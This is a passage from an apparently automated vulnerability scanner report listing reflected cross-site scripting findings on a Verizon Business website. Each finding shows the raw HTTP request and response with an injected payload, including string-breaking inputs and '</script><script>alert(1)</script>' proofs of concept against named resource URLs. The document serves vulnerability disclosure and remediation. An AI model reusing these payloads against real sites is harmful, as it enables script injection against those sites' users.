ETag: "4c3d21cd192ad801c754a5b4e12b69f6"
Last-Modified: Wed, 17 Nov 2010 00:23:12 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:23:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d31be2b7a-81e2-43cc-813d-39ab7bb20373|VTID%3dba6fec21-057f-46c1-9357-4ccfb442f2ab|SX%3d1289954591|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:26:55 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:23:12 GMT
Content-Length: 75917

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a2a4-111-Data+and+IP+Services.xml84dc9</script><script>alert(1)</script>01dab82d99f</url>
...[SNIP]...

1.681. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a6-111-Internet+Access.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72785'%3ba3f9ba49e60 was submitted in the REST URL parameter 1. This input was echoed as 72785';a3f9ba49e60 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources72785'%3ba3f9ba49e60/1002a2a6-111-Internet+Access.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources72785';a3f9ba49e60/1002a2a6-111-Internet+Access.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.682. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a6-111-Internet+Access.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffc79"%3b90aac038efd was submitted in the REST URL parameter 1. This input was echoed as ffc79";90aac038efd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesffc79"%3b90aac038efd/1002a2a6-111-Internet+Access.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesffc79";90aac038efd/1002a2a6-111-Internet+Access.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.683. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a6-111-Internet+Access.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e901'%3ba4e41b5ce93 was submitted in the REST URL parameter 2. This input was echoed as 8e901';a4e41b5ce93 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/8e901'%3ba4e41b5ce93 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:24:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/8e901';a4e41b5ce93'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.684. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a6-111-Internet+Access.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4f42</script><script>alert(1)</script>b6ddef0d89a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a6-111-Internet+Access.xmld4f42</script><script>alert(1)</script>b6ddef0d89a HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "27fd8fb8cb81a48d3bcf993c35eeb518"
Last-Modified: Wed, 17 Nov 2010 00:23:59 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:23:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d0348f92e-6da5-43cc-b706-e9939b2995c5|VTID%3d71a9e27c-d3e4-4679-a4f3-a41643f7ebfe|SX%3d1289954639|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:27:43 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:23:59 GMT
Content-Length: 33524

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a6-111-Internet+Access.xmld4f42</script><script>alert(1)</script>b6ddef0d89a</url>
...[SNIP]...

1.685. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a7-111-IT+Solutions+and+Hosting.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 801ab"%3b3b4888328d was submitted in the REST URL parameter 1. This input was echoed as 801ab";3b4888328d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources801ab"%3b3b4888328d/1002a2a7-111-IT+Solutions+and+Hosting.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:06 GMT
Content-Type: text/html
Content-Length: 40680
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources801ab";3b4888328d/1002a2a7-111-IT+Solutions+and+Hosting.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.686. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a7-111-IT+Solutions+and+Hosting.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 661fe'%3b0bd7afdc749 was submitted in the REST URL parameter 1. This input was echoed as 661fe';0bd7afdc749 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources661fe'%3b0bd7afdc749/1002a2a7-111-IT+Solutions+and+Hosting.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:23:34 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources661fe';0bd7afdc749/1002a2a7-111-IT+Solutions+and+Hosting.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.687. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a7-111-IT+Solutions+and+Hosting.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20be9'%3b5db6709c870 was submitted in the REST URL parameter 2. This input was echoed as 20be9';5db6709c870 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/20be9'%3b5db6709c870 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/20be9';5db6709c870'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.688. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a7-111-IT+Solutions+and+Hosting.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd75a</script><script>alert(1)</script>6c2d087a617 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a7-111-IT+Solutions+and+Hosting.xmldd75a</script><script>alert(1)</script>6c2d087a617 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "0a4249db00ac2d4adf123638e011194e"
Last-Modified: Wed, 17 Nov 2010 00:26:19 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d4ec9dfb7-b8b3-4ea6-8748-f3928c7a2506|VTID%3d961d5a18-2eba-4f86-b217-f4aa9a0ff756|SX%3d1289954779|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:03 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:19 GMT
Content-Length: 70790

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a7-111-IT+Solutions+and+Hosting.xmldd75a</script><script>alert(1)</script>6c2d087a617</url>
...[SNIP]...

1.689. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a8-111-Managed+Networks.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb4e7"%3b535fc5b796a was submitted in the REST URL parameter 1. This input was echoed as cb4e7";535fc5b796a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcescb4e7"%3b535fc5b796a/1002a2a8-111-Managed+Networks.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:23:54 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcescb4e7";535fc5b796a/1002a2a8-111-Managed+Networks.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.690. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a8-111-Managed+Networks.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74f27'%3b247bcd4fe92 was submitted in the REST URL parameter 1. This input was echoed as 74f27';247bcd4fe92 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources74f27'%3b247bcd4fe92/1002a2a8-111-Managed+Networks.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:24:13 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources74f27';247bcd4fe92/1002a2a8-111-Managed+Networks.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.691. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a8-111-Managed+Networks.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce3d0'%3be0996009779 was submitted in the REST URL parameter 2. This input was echoed as ce3d0';e0996009779 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/ce3d0'%3be0996009779 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/ce3d0';e0996009779'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.692. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a8-111-Managed+Networks.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcde1</script><script>alert(1)</script>744f27ee1b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a8-111-Managed+Networks.xmlbcde1</script><script>alert(1)</script>744f27ee1b4 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "ddae6621b7c523a3119cd04747c05788"
Last-Modified: Wed, 17 Nov 2010 00:26:09 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dd9b02a9e-045e-416a-af05-709f29762b2b|VTID%3d224caeb0-107c-4229-9472-4add7dd6a23a|SX%3d1289954768|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:29:52 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:09 GMT
Content-Length: 50625

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a2a8-111-Managed+Networks.xmlbcde1</script><script>alert(1)</script>744f27ee1b4</url>
...[SNIP]...

1.693. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a9-111-Premises+Equipment.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c833'%3b1bc556e0e8d was submitted in the REST URL parameter 1. This input was echoed as 8c833';1bc556e0e8d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8c833'%3b1bc556e0e8d/1002a2a9-111-Premises+Equipment.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
